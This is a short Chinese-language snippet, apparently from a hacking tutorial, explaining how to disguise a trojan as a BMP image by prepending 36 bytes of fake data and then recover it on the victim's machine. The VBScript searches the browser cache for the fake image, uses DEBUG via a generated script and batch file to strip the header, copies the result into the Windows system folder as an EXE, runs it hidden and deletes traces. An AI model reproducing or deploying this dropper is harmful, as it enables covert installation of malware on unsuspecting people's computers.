自已做一个木马，然后前面加上36字节的伪装数据存成BMP，然后在本地用DEBUG截断另存为EXE。

sub FF
SearchBMPFile fso.GetFolder(CACHE),"shovts[1].bmp"
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"shovts[2].bmp"
End sub


Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname');
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
On Error Resume Next
File.Delete
if FSO.FileExists(str) then exit function
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
'下面的数字是十六进制的EXE文件的大小
Lt.WriteLine("9ABC")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
Lt.WriteLine("@echo off")
Lt.WriteLine("debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "shovts.exe>" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine(winsys & "shovts.exe")
Lt.Close
WSH.Run tmp & "tmp.bat",false,6
On Error Resume Next
'FSO.GetFile(tmp & "tmp.bat").Delete
sucess=1
window.close ()
end if